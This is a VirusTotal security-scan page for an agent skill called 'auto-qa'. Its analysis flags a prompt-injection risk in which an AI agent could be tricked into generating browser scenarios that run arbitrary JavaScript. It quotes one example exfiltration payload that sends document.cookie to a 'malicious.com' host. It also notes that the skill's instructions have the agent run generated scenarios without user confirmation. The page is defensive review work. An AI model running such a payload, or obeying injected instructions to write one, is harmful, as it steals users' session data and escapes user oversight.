Back to skill
Skillv1.2.0
VirusTotal security
Auto Qa · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
SuspiciousApr 30, 2026, 4:35 AM
- Hash
- 0a1a41e880979ec190c61ed922dbf422e0fe4f1372539ad979d364eac07ab614
- Source
- palm
- Verdict
- suspicious
- Code Insight
- Type: OpenClaw Skill Name: auto-qa Version: 1.2.0 The skill bundle is classified as suspicious due to the inherent risk of prompt injection against the AI agent that generates the scenario JSON, specifically through the `evaluate` action in `src/skills/auto-qa/scripts/run_autoqa.py`. While the script implements an action whitelist and scenario validation, the `evaluate` action allows arbitrary JavaScript execution within the browser context. If a malicious user can craft a prompt that tricks the AI agent into generating a scenario with a harmful JavaScript payload (e.g., `fetch('https://malicious.com/exfil?data=' + document.cookie)`), it would constitute a severe vulnerability (browser-side RCE). The `SKILL.md` also instructs the agent to directly execute generated scenarios without explicit user confirmation, amplifying this risk. There is no evidence of intentional malicious behavior within the provided code or documentation; the risky capabilities are part of legitimate browser automation.
- External report
- View on VirusTotal